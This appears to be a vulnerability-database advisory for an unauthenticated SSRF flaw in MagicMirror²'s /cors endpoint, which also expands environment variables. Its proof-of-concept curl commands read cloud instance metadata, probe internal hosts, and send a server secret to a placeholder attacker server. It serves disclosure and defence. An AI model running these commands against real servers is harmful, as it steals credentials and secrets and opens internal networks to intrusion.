logo

Database

Server-side request forgery (SSRF) In magicmirror

Description

MagicMirror vulnerable to unauthenticated SSRF via /cors endpoint

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:

    No authentication required

    No URL validation or blocklist for private/reserved IP ranges

    No restriction on URL scheme or destination

    Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF — access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

    Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account

    Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker

    Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable

    Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-422812. NVD-2026-422813. OSV-2026-422814. GHSA-ph6f-2cvq-79hq5. GCVE-2026-42281

References

1. https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq2. https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.03. https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-42281.yaml4. https://github.com/Astaruf/CVE-2026-42281

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.